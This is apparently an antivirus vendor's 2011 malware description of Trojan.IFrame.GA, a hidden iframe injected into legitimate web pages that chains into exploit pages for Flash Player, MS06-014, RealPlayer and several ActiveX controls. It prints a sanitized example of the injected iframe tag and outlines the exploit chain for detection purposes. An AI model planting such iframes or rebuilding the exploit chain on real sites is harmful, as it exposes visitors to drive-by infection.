Home / malwarePDF  

Trojan.IFrame.GA


First posted on 21 November 2011.
Source: BitDefender

Aliases :

There are no other names known for Trojan.IFrame.GA.

Explanation :

Detects a type of malicious iframes injected in legit webpages.
The iframe tag looks like:

<iframe src=http://sanitized/fxx.htm width=100 height=0>

I'll base this description on a valid site(many of them were sanitized or taken down): hxxp://www.*******.cn/a114/fxx.htm (please don't access that page in your browser unless you know what you're doing.)

The fxx.htm page which only contains a SCRIPT tag and here the fun begins(with many iframes injected in page):
* fx.htm - this one tries to exploit a vulnerability in FlashPlayer
* ../a1/ss.htm
* ../a1/MS06014.htm
* ../a1/sina.htm - if Sina Downloader.DLoader.1 Activex Control is available
* ../a1/no.htm - if UUUPGRADE.UUUpgradeCtrl.1 ActiveX Control is available
* ../a1/bfyy.htm - if MPS.StormPlayer ActiveX Control is available
* ../a1/GLWORLD.html - for GLIEDown.IEDown.1
* ../a1/real.htm - for RealPlayer IERPCtl.IERPCtl.1 if RealPlayer's version is older than 6.0.14.552 (or it)
* ../a1/real.hTml - if RealPlayer's version is newer than 6.0.14.552

fx.htm is detected as Trojan.Exploit.ANPI and, depending on browser, leads to a Trojan.Exploit.SSX for browser which have "msie" in their User-Agent, respectively Trojan.JS.Redirector.E for the rest of browsers. This leads eventually to some flash files detected as Exploit.SWF.Gen.

Last update 21 November 2011

 

TOP